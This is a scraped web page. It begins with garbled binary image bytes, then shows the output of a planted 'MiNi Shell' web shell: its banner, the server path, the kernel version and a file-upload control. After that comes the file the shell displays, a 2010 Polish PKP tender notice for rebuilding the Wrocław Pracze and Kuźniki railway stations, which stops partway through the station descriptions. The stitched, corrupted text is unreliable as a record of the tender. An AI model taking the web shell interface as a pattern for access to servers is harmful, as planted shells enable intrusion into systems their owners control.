JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100412/102282-N-2010.html

<p class="kh_header"><b>Wrocław: WYKONANIE ROBÓT BUDOWLANO - MONTAŻOWYCH DLA  PROJEKTÓW PN.
 PRZEBUDOWA DWORCA KOLEJOWEGO WROCŁAW PRACZE
ORAZ
 PRZEBUDOWA DWORCA KOLEJOWEGO WROCŁAW KUŹNIKI</b><br>
<b>Numer ogłoszenia: 102282 - 2010; data zamieszczenia: 12.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PKP Spółka Akcyjna Oddział Gospodarowania Nieruchomościami we Wrocławiu , ul. Joannitów 13, 50-525 Wrocław, woj. dolnośląskie, tel. 071 717 13 33, faks 071 717 54 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> nz.wroc.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE ROBÓT BUDOWLANO - MONTAŻOWYCH DLA  PROJEKTÓW PN.
 PRZEBUDOWA DWORCA KOLEJOWEGO WROCŁAW PRACZE
ORAZ
 PRZEBUDOWA DWORCA KOLEJOWEGO WROCŁAW KUŹNIKI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlano-montażowych dla projektów pn. Przebudowa dworca kolejowego Wrocław Pracze oraz Przebudowa dworca kolejowego Wrocław Kuźniki.
Przedmiot zamówienia jest jednym zadaniem inwestycyjnym o łącznym terminie realizacji do 28 tygodni, którego składową są dwa projekty opisane w niniejszym OPZ.Okres rękojmi wynosi 156 tygodni dla każdego wykonanego projektu i jest liczony od dnia uzyskania pozwolenia na użytkowanie po dokonanym wcześniej odbiorze końcowym. Zamawiający dopuszcza rozpoczęcie okresu rękojmi odrębnie dla każdego projektu.Wymieniony w Części I pkt 9.1 SIWZ Kluczowy Zespół Ekspertów stanowi jedynie minimalne wymagania Zamawiającego, które Wykonawca powinien potraktować dyrektywnie lecz nie obligatoryjnie.  Zamawiający dopuszcza dla rzetelnego i skutecznego wypełnienia zobowiązań Wykonawcy wskazanie dodatkowych osób, ponad wymagane minimum, na poszczególne stanowiska wedle uznania Wykonawcy. Wykonawca jest odpowiedzialny za jego prawidłowy dobór.  Wskazane dodatkowe osoby na poszczególne stanowiska muszą spełniać warunki udziału w postępowaniu opisane w Części I pkt 9.1 B.3 SIWZ.  
II.   Przebudowa dworca kolejowego Wrocław Pracze
1. PRZEZNACZENIE I PROGRAM UŻYTKOWY BUDYNKU 
1.1. OGÓLNA CHARAKTERYSTYKA BUDYNKU - RYS HISTORYCZNY
Budynek pełni funkcję dworca kolejowego. Został wybudowany w drugiej połowie XIXw, techniką tradycyjną - murowaną. Usytuowany został wzdłuż ulicy Towarowej we Wrocławiu. Ceglany budynek składa się z trzech brył o zróżnicowanej wysokości. W najwyższej czterokondygnacyjnej znajduje się klatka schodowa prowadząca do lokali mieszkalnych jak również na poddasze nieużytkowe. Wejście główne do budynku dworca znajduje się w części trzykondygnacyjnej. W parterowej części znajdował się magazyn ekspedycyjny. Każda z części jest zadaszona dachem dwuspadowym, krytym papą. Budynek jest częściowo podpiwniczony. Część piwnicy została zalana i obecnie znajduje się tam woda. Na elewacjach dworca widoczne są liczne ubytki cegły klinkierowej oraz spękania muru. Niestety obiekt jest obecnie zamknięty i nie pełni swojej funkcji. Ceglane elewacje zostały wandalsko popisane i pomazane. Brak przeprowadzanych remontów doprowadził budynek do dewastacji a pozabijane płytami okna odstraszają. Budynek jest zaniedbany i wymaga remontu elewacji, więźby dachowej jak również wnętrza, by ponownie mógł być użytkowany. Należy go również przystosować dla osób niepełnosprawnych. 
W sąsiedztwie budynku dworca, od strony wschodniej został usytuowany budynek gospodarczy. Ceglany, parterowy obiekt pełni obecnie funkcję magazynową dla mieszkańców. Projektowana przebudowa budynku dworca umożliwi poprawę standardu obsługi podróżnych i poprawę stanu technicznego obiektu oraz jego funkcjonalność.W budynku zostanie wymieniona instalacja elektryczna wewnętrzna, wodno-kanalizacyjna wewnętrzna, telefoniczna, oraz zostanie wykonana sieć komputerowa i internetowa, instalacja systemu informacji wizualnej oraz monitoring z włączeniem do systemu SOK, zgodnie ze stosownymi przepisami i wymogami Ppoż, SANEPID oraz BHP. 
1.2. FORMA ARCHITEKTONICZNA 
 Mając na uwadze istniejący układ pomieszczeń w budynku dworca, wytyczne Inwestora oraz wymogi ppoż starali się zaprojektować przebudowę wnętrza budynku, tak by był on funkcjonalny. 
Zaprojektowano modernizację wszystkich pomieszczeń dworca, odbudowe klatki schodowej, renowację elewacji. Główne wejście do dworca prowadzi do poczekalni. Istniejące schody prowadzące do wejścia projektuje się dostosować do obowiązujących norm. W związku z tym należy przewidzieć poszerzenie spocznika oraz stopni schodów. Murki zewnętrzne dostosować odpowiednio do nowej długości schodów. Z pomieszczenia poczekalni można przejść na drugą stronę budynku, na perony. W poczekalni umieszczono okienko kasowe jak również ławki dla podróżnych. Na ścianie nad ławkami planuje się powiesić tablice informacyjną czasu odjazdu i przyjazdu pociągów. Z pomieszczenia poczekalni znajduje się wejście do istniejącego pomieszczenia kablowni, jak również do pomieszczenia służbowego dla pracowników dworca. Przy wyjściu na perony zaprojektowano sanitariaty dla podróżnych. W części najbardziej wysuniętej na peron zaprojektowano pomieszczenie przeznaczone na cele komercyjne. 
 Istniejącą kotłownię powiększono i wyznaczono miejsce na składowanie opału. 
Całą część byłego magazynu ekspedycji projektuje się przeznaczyć na pomieszczenia komercyjne z wspólnym pomieszczeniem socjalnym oraz z sanitariatem. By ułatwić osobom niepełnosprawnym dostęp do tych pomieszczeń planuje się zamontować platformę schodową. Na istniejących schodach oraz komunikacji przed wejściem zaprojektowano balustradę systemową ze szklanym wypełnieniem. Dostęp do budynku dworca dla osób niepełnosprawnych projektanci przewidzieli wejściem od strony peronów. Ponadto projektuje się sanitariat ogólnodostępny dostosowany dla osób niepełnosprawnych. Okienko kasowe projektuje się na wysokości dostosowanej do korzystania osób niepełnosprawnych -90cm. W istniejącym budynku gospodarczym zaprojektowano remont elewacji, zadaszenia oraz przywrócenie historycznego wyglądu. 
Budynek dworca, ze względu na obowiązujące przepisy, należy docieplić. Z powodu historycznego wyglądu ceglanych elewacji budynek należy docieplić od wewnątrz. 
1.3. PROJEKTOWANE ROZWIĄZANIA KONSTRUKCYJNE, OGÓLNOBUDOWLANE I MATERIAŁOWE - STAN ISTNIEJĄCY 
1.3.1. FUNDAMENTY 
Ławy fundamentowe ceglane. Budynek nie posiada widocznych pęknięć, ani rozwarstwień spowodowanych osiadaniem lub spękaniem fundamentów, co wskazuje na prawidłową pracę fundamentów przekazujących obciążenie na grunt. 
1.3.2.	ŚCIANY FUNDAMENTOWE 
Ściany piwnic z cegły pełnej gr.51cm oraz 38 i 25 cm. Konstrukcyjnie nie wykazują wyboczeń ani pęknięć. 
W części piwnicznej od strony peronu zalega woda powodująca zawilgocenie ścian piwnic i wyższych kondygnacji. Wodę należy wypompować, osuszyć ściany i posadzki a następnie wykonać izolację przeciwwilgociową fundamentów i ścian piwnic. 
1.3.3.	STROPY 
Stropy pośrednie budynku o konstrukcji drewnianej oraz stalowo-ceramiczne. Stan techniczny stropów budynku ocenia się jako dobry. 
Strop nad piwnicą, w której zalega woda jest w złym stanie technicznym. Należy dokonać rozbiórki stropu i wykonać nowy. 
W pomieszczeniu kablowni częściowo wylano nowy strop żelbetowy w wyniku czego belka drewniana stropu ulega korozji na styku z betonem. Belkę tę należy wzmocnić i zabezpieczyć przed wpływem betonu np. poprzez przekładkę z papy. 
W klatce schodowej widoczne jest wybrzuszenie stropu nad piętrem. Należy skuć odspojony tynk, ocenić stan techniczny elementów stropowych a następnie wzmocnić lub wymienić uszkodzone elementy. 
1.3.4.	ŚCIANY CZĘŚCI NADZIEMNEJ 
Ściany części nadziemnej murowane z cegły pełnej o zróżnicowanej grubości 25-51cm, zewnętrzne jednostronnie otynkowane (od wewnątrz). Ściany nie wykazują zarysowań ani spękań. Ich stan techniczny jest dobry. 
W budynku widoczne jest spękanie muru szczytowego poddasza (od strony peronu) spowodowane zmianą układu konstrukcyjnego więźby dachowej i przekazanie obciążenia z dachu na ścianę. Należy odtworzyć więźbę (przesunięcie słupa do ściany) na wzór układu pierwotnego od strony ulicy Towarowej. 
W części podpiwniczonej z zalegającą wodą ściany są zawilgocone. Należy osuszyć ścianę, skuć odspojony tynk a następnie wykonać nowy tynk i uzupełnić spoiny w murze ceglanym i ścianę 
1.3.5. KOMINY I PRZEWODY KOMINOWE 
 Murowane z cegły pełnej w dobrym stanie technicznym. Uszkodzone korony kominów i murków rozebrać i wymurować nowe, doprowadzić do wymogów normowych. 
1.3.6. ŚCIANKI DZIAŁOWE 
Ścianki działowe z cegły pełnej obustronnie tynkowane. W dobrym stanie technicznym. 
1.3.7. KLATKA SCHODOWA 
Schody o konstrukcji drewnianej w złym stanie technicznym. Należy dokonać remontu biegów schodowych i balustrad poprzez wymianę uszkodzonych elementów i renowację pozostałych. 
Ściany klatki schodowej należy oczyścić z odspojonego tynku i nanieść nowy. Wszelkie instalacje biegnące po ścianach, schować w bruzdach, a odkryte obecnie liczniki zamknąć w szafce, by nie dopuścić do nich osób niepożądanych. Ponadto należy zorganizować zamknięcie drzwi piwnicy, tak by dostęp do niej mieli tylko mieszkańcy oraz osoby do tego upoważnione. Schody do piwnicy wzmocnić, zaopatrzyć w balustradę, uzupełnić stopnie. 
1.3.8. DACH 
 Dachy dwuspadowe pokryte papą o konstrukcji drewnianej w złym stanie technicznym. Należy dokonać wymiany pokrycia dachowego (papy). Należy przywrócić układ statyczny więźby dachowej poprzez wymianę skorodowanych elementów drewnianych: deskowania i belek konstrukcyjnych oraz wykonać nowe obróbki blacharskie. 
Elementy drewniane należy zaimpregnować przeciwpożarowo, przeciw owadom i grzybom do cech NPO. 
Brak wyłazu dachowego. 
1.3.9. WYKOŃCZENIE OBIEKTU - ELEWACJE 
 Elewacje ceglane budynku są w dobrym stanie technicznym. Jednak widoczne są liczne ubytki w cegłach oraz liczne graffiti. Należy usunąć graffiti na elewacjach oraz uzupełnić ubytki cegieł i spoin. Ściany zabezpieczyć specjalnym środkiem antygraffitowym. Ponadto, by zapobiec ponownego wymywania cegieł w cokole budynku, należy odtworzyć opaskę ze spadkiem, wokół budynku. 
Zgodnie z historycznym wyglądem budynku, należy odtworzyć drewniane zdobienia w polach szczytowych, oraz drewnianą wiatę od strony peronów. Dodatkowe, zbędne elementy umieszczone na elewacjach należy usunąć. 
Należy wymienić stolarkę okienną i drzwiową oraz uszczelnić parapety. 
Wszelkie wiszące na elewacjach kable należy usunąć. Należy wymienić tablice informacyjne dworcowe. Na budynku znajdują się szpecące lampy typu latarnia. Należy je zastąpić nowym oświetleniem elewacyjnym. 
2. INSTALACJE 
2.1 INSTALACJA CENTRALNEGO OGRZEWANIA. 
Instalacja c.o. wodna, pompowa, dwururowa o parametrach 80/60oC zasilana z nowoprojektowanej kotłowni. Rozprowadzenie poziomów, pionów c.o i podejść do grzejników - w bruzdach ściennych. Grzejniki płytowe z podejściami (od ściany). Każdy grzejnik wyposażony w zawory termostatyczne z głowicą termostatyczną z zabezpieczeniem antykradzieżowym. Rury c.o. wielowarstwowe typu PEX-AL.-PEX. 
2.2. KOTŁOWNIA OPAŁOWA ( NA  EKO-GROSZEK)
 Projektuje się kotłownię opałową opartą o kocioł z ciągłym podawaniem paliwa, przystosowany do spalania (eko-groszku). Zastosowano w nim mechaniczny palnik retortowy w połączeniu ze stalowym wymiennikiem ciepła. Paliwo gromadzone będzie w wydzielonym pomieszczeniu obok pomieszczenia kotłowni. Dostawa paliwa do kotła - z zasobnika przykotłowego przy użyciu podajnika ślimakowego. Zasyp węgla do zasobnika przykotłowego - ręczny. Napełnianie paliwem z magazynu węgla - ręczne, przez obsługę kotłowni. 
2.3 INSTALACJA WODOCIĄGOWA. 
 Projektuje się wykonanie instalacji zimnej i ciepłej wody z rur wielowarstwowych typu PEX-AL.-PEX. Rozprowadzenie przewodów do przyborów w bruzdach ściennych. W zakres wchodzi również wymiana pionów zasilających mieszkania znajdujące się nad pomieszczeniami dworca. 
2.4 INSTALACJA KANALIZACYJNA. 
Projektuje się wykonanie kanalizacji z rur kielichowych z PVC łączonych na uszczelki gumowe. Podejścia do przyborów biegnące nad posadzką, ze względów estetycznych umieścić w zakrytych bruzdach ściennych. W zakres wchodzi również wymiana pionów kanalizacyjnych wpiętych do istniejącej kanalizacji podposadzkowej. Piony główne wentylowane będą wywiewkami ponad dachem. Wywiewki - producenta rur. W ubikacjach z pisuarem - kratki ściekowe z PVC z kratką ze stali nierdzewnej oraz syfonem. 
2.5 WENTYLACJA 
Projektuje się pozostawienie wentylacji grawitacyjnej jako przewodniej. Planuje się wymianę wszystkich kratek oraz kanałów wentylacyjnych. Kanały wykonać z blachy ocynkowanej. W poszczególnych pomieszczeniach projektuje się wentylatory systemowe. Zaprojektowano również wentylację mechaniczną jako wspomagającą - wg opracowania projektu instalacji sanitarnych. 
W części sanitariatów dla podróżnych należy zdemontować według projektu komin wentylacyjny. 
Zaprojektowano 3 nowe kominy. 
3. LOKALIZACJA ORAZ STAN ISTNIEJĄCY 
3.1. LOKALIZACJA I STRUKTURA WŁASNOŚCIOWA 
Budynek dworca jest usytuowany we Wrocławiu na działce o nr 2, AM-30, obręb Pracze Odrzańskie, Miasto Wrocław, przy ulicy Towarowej 6. Właścicielem działki jest skarb Państwa. Inwestor jest wieczystym użytkownikiem  terenu objętego opracowaniem.
3.2 WYZNACZNIKI ROZWIĄZANIA PRZESTRZENNEGO 
Obszar objęty opracowaniem stanowi działkę o numerze ewidencyjnym: nr 2, AM-30, obręb Pracze Odrzańskie, Miasto Wrocław, przy ulicy Towarowej 6. 
Projekt przebudowy obiektu został ukierunkowany przez wytyczne konserwatora: 
  - przyjęte w zaopiniowanych u Miejskiego Konserwatora Zabytków projektach autorstwa Biura Inżynierskiego Tomasz Jaworski z lutego 2008r., z korektą: 
- płytki ceramiczne w poczekalni (posadzka) muszą zostać wymienione na nowe takie same (nie dopuszcza się zmiany rozmiarów, wątku i kolorystyki) - projektuje się wymianę płytek ceramicznych o takim samym wątku, kolorystyce i rozmiarze co istniejące 
- należy przewidzieć nowe bezpośrednie przejście od dworca przez tory, na teren kampusu EIT+, który znajduje się tuż za ogrodzeniem stacji - projekt przejścia przez tory nie wchodzi w zakres tego opracowania. Przejście zostanie wyznaczone w dodatkowym opracowaniu. 
- Należy rozważyć adaptację magazynu do nowych funkcji (pomieszczenie to ze względu na swoją dużą kubaturę, sąsiedztwo powstającego kampusu oraz planowaną kolej aglomeracyjną, może pełnić funkcję np. gastronomiczną) - zaadaptowano stary magazyn na pomieszczenie komercyjne. 
 Zgodnie z pierwotnym przeznaczeniem budynek będzie pełnić funkcję dworca. Niezbędne jest przeprowadzenie remontu wnętrza jak również elewacji. 
Należy wymienić okna na drewniane energooszczędne. 
Drzwi do poczekalni i na peron należy odrestaurować jak również przeprowadzić renowacje drewnianej wiaty znajdującej się przy wyjściu na perony. 
W części głównej budynku planuje się zachować istniejącą konstrukcję ścian nośnych, stropów i zadaszenia. Wymiary otworów drzwiowych muszą zostać doprowadzone do zgodności z dzisiejszymi przepisami. Istniejące instalacje wewnętrzne jako nie spełniające wymogów planuje się wymienić na nowe. 
Naprawy i uzupełnienia wymagają detale elewacyjne w całości zachowane na budynku takie jak gzymsy. Należy wymienić orynnowanie. Obce elementy na elewacji takie jak kraty stalowe w oknach, należy usunąć w zamian zastosować stolarkę antywłamaniową. We wnętrzu budynku niezbędne jest wyremontowanie wszystkich pomieszczeń oraz remont klatki schodowej. Należy dokonać odbudowy budynku wolnostojącego gospodarczego, usytuowanego w sąsiedztwie dworca. 
3.3 PROGRAM KUBATUROWY 
Powierzchnia zabudowy - 345,98 m2 
Powierzchnie utwardzone -1784,12 m2
Powierzchnia terenów zielonych istniejących - 40,20 m2 
Powierzchnie projektowane: 
Projektowane powierzchnie utwardzone - 565,61 m2
Projektowane powierzchnie zielone - 42,38 m2 
Wysokość budynku - 11,95 m 
Kubatura budynku - 2910,62 m3 
Geometria dachu: 
Dach o spadkach: 19o, 10o i 6o 
III. Przebudowa dworca kolejowego Wrocław Kuźniki
1. PRZEZNACZENIE I PROGRAM UŻYTKOWY BUDYNKU 
1.1. OGÓLNA CHARAKTERYSTYKA BUDYNKU - RYS HISTORYCZNY
Budynek pełni funkcję dworca kolejowego. Został wybudowany w drugiej połowie XIXw, techniką tradycyjną - murowaną. 
Obiekt składa się z trzech brył. Korpus środkowy został ustawiony szczytowo do ulicy i torów. Dwukondygnacyjna bryła z poddaszem nieużytkowym została wybudowana na planie prostokąta. Rozlokowano w niej pomieszczenia służbowe, hol i poczekalnię. Na parterze korpusu zastosowano dwa szerokie okna zamknięte odcinkiem łuku, a wyżej w szczycie mniejsze prostokątne, które zaopatrzono w drewniane okiennice. Budynek przekryty został dachem dwuspadowym stromym. Półkolista klatka schodowa wychodziła ponad połać dachu i była osobno zadaszona. Na piętrze umieszczono lokale mieszkaniowe. 
Do części głównej budynku dobudowane zostały dwie boczne części parterowe, przekryte niższymi dachami dwuspadowymi. Z jednej strony było wejście główne od ulicy, skomunikowane z holem oraz przejście do tunelu prowadzącego na peron, z drugiej strony znajdowały się stajnie i pralnia. 
Obiekt uległ technicznemu zużyciu. Większość jego pomieszczeń ze względu na stan techniczny jest zamknięta dla podróżnych, część jest wynajmowana na cele komercyjne. W jednej z jego bocznych części jest zawilgocenie belek konstrukcji dachu, co doprowadziło do ubytków w konstrukcji oraz dachówkach. Ponadto na elewacjach widać liczne ubytki z tynku oraz malowidła graffiti. Otwory okienne i drzwiowe zostały zamurowane, teren wokół ogrodzony i oznakowany zakazem wstępu. Obecny stan szpeci i stwarza zagrożenie dalszej degradacji budynku. 
Budynek dworca jest wyeksploatowany i zużyty technicznie i wymaga przebudowy elewacji, więźby dachowej oraz wnętrza, by ponownie umożliwić użytkowanie go zgodnie z jego funkcją. Projektowana przebudowa budynku dworca umożliwi obsługę pasażerów zgodnie ze współczesnymi standardami oraz poprawę stanu technicznego.W budynku zostanie wymieniona instalacja elektryczna wewnętrzna, wodno-kanalizacyjna wewnętrzna, telefoniczna, oraz zostanie wykonana sieć komputerowa i internetowa, instalacja systemu informacji wizualnej oraz monitoring z włączeniem do systemu SOK, oraz dostosowanie obiektu do przepisów i wymogów Ppoż, SANEPID oraz BHP. 
1.2. FORMA ARCHITEKTONICZNA 
Mając na uwadze istniejący układ pomieszczeń w budynku dworca, wytyczne konserwatora zabytków oraz wymogi ppoż zaprojektowano przebudowę wnętrza budynku, tak by był on funkcjonalny, poprzez modernizację wszystkich pomieszczeń dworca i instalacji, odbudowę klatki schodowej, przebudowę elewacji i odtworzenie detali architektonicznych. 
Główne wejście do części dworca prowadzi do hollu, skąd można udać się na perony lub do poczekalni. Po prawej stronie znajdują się toalety dla podróżnych, które projektuje się przebudować i dostosować dla osób niepełnosprawnych. 
Zgodnie z wytycznymi konserwatora zabytków, zaprojektowano poczekalnię w południowej części budynku, tak by dostęp do niej był bezpośrednio z hollu. W poczekalni znajdują się automaty do biletów oraz okienko kasowe. Po lewej stronie pomieszczenia planuje się ustawić ławki dla podróżnych. Na ścianie nad ławkami planuje się powiesić tablice informacyjną czasu odjazdu i przyjazdu pociągów. Z pomieszczenia starej poczekalni wydzielono pomieszczenie na cele komercyjne. 
W północnej części budynku zaplanowano pomieszczenie socjalne wraz z sanitariatami dla pracowników dworca oraz pomieszczenia magazynowe. Pomieszczenie kotłowni, ze względu na przepisy ppoż przeniesiono do pomieszczenia z oknem. Istniejąca kotłownia w budynku nie spełnia obecnych wymogów technicznych.
Obecnie opał jest dostarczany do kotłowni przez pomieszczenie dawnej poczekalni. 
W bocznej parterowej części budynku planuje się pomieszczenie na cele komercyjne z pomieszczeniem socjalnym i sanitariatem. 
Dostęp do budynku dla osób niepełnosprawnych przewidziano wejściem od strony peronów. Ponadto projektuje się sanitariat ogólnodostępny dostosowany dla osób niepełnosprawnych. Na schodach prowadzących do tunelu podziemnego na peron zaprojektowano platformę schodową umożliwiającą osobom niepełnosprawnym dostęp do peronu. Okienko kasowe projektuje się na wysokości dostosowanej do korzystania osób niepełnosprawnych - 90cm. 
Budynek dworca, ze względu na obowiązujące przepisy, należy docieplić. Z powodu granicy działki, która przebiega od strony ulicy, po obrysie budynku, ściany szczytowe należy ocieplić od wewnątrz, resztę od zewnątrz. 
1.3. ROZWIĄZANIA KONSTRUKCYJNE, OGÓLNOBUDOWLANE I MATERIAŁOWE- STAN ISTNIEJĄCY 
1.3.1 OGÓLNA CHARAKTERYSTYKA 
Projekt obejmuje przebudowę wnętrza budynku oraz odbudowę elewacji i klatki schodowej, dlatego nie ingerowano w statykę budynku. Zaprojektowano odbudowe zniszczonej więźby dachowej parterowej części bocznej dworca. 
Projektowana modernizacja budynku nie narusza głównego układu konstrukcyjnego, zmianom ulegają jedynie ściany murowane działowe, które projektuje się wyburzyć lub dobudować, bądź projektowane są przekucia i zamurowania otworów drzwiowych. 
1.3.2. FUNDAMENTY 
Ławy fundamentowe ceglane. Budynek nie posiada widocznych pęknięć, ani rozwarstwień spowodowanych osiadaniem lub spękaniem fundamentów, co wskazuje na prawidłową pracę fundamentów przekazujących obciążenie na grunt. 
1.3.3. ŚCIANY FUNDAMENTOWE 
Ściany fundamentowe z cegły pełnej gr.38 i 25 cm. Ściany są zawilgocone, należy je osuszyć i wykonać izolację przeciwwilgociową oraz nałożyć wyprawę tynkarską wraz z cokołem. Należy również przywrócić opaskę ze spadkiem wokół budynku, co zapobiegnie ponownemu zniszczeniu cokołu. 
1.3.4. STROPY 
Stropy pośrednie budynku o konstrukcji drewnianej. Stan techniczny stropów budynku ocenia się jako dobry. 
1.3.5. ŚCIANY CZĘŚCI NADZIEMNEJ 
Ściany części nadziemnej murowane z cegły pełnej o gr.38 i 25 cm, obustronnie otynkowane. Ściany nie wykazują zarysowań ani spękań. Ich stan techniczny jest dobry. Ściany zewnętrzne są zawilgocone, należy je osuszyć i wykonać izolację przeciwwilgociową oraz nałożyć wyprawę tynkarską. 
Ponadto cokół wokół budynku uległ zawilgoceniu. Należy go przebudować poprzez skucie tynków i zaizolowanie od poziomu fundamentów. Izolacje należy wyprowadzić minimum 30 cm ponad grunt, następnie nałożyć wodoodporny tynk. 
1.3.6. KOMINY I PRZEWODY KOMINOWE 
Murowane z cegły pełnej w dobrym stanie technicznym. Uszkodzone korony kominów części bocznej rozebrać i wymurować nowe. 
1.3.7. ŚCIANKI DZIAŁOWE 
Ścianki działowe z cegły pełnej obustronnie tynkowane. W dobrym stanie technicznym. 
1.3.8. KLATKA SCHODOWA 
Schody o konstrukcji stalowej ze stopniami drewnianymi w dobrym stanie technicznym. Należy dokonać odbudowy biegów schodowych i balustrad poprzez usunięcie starych powłok malarskich i nałożenie nowych. Na ścianach widoczne są uszkodzenia w wprawach tynkarskich i malarskich. Należy usunąć uszkodzone wyprawy a następnie nałożyć nowe. Istniejące przewody elektryczne oraz instalacje sanitarne, należy schować w bruzdach ścian a odkryte obecnie liczniki zamknąć w szafce, by nie dopuścić do nich osób niepożądanych. 
1.3.9. DACH 
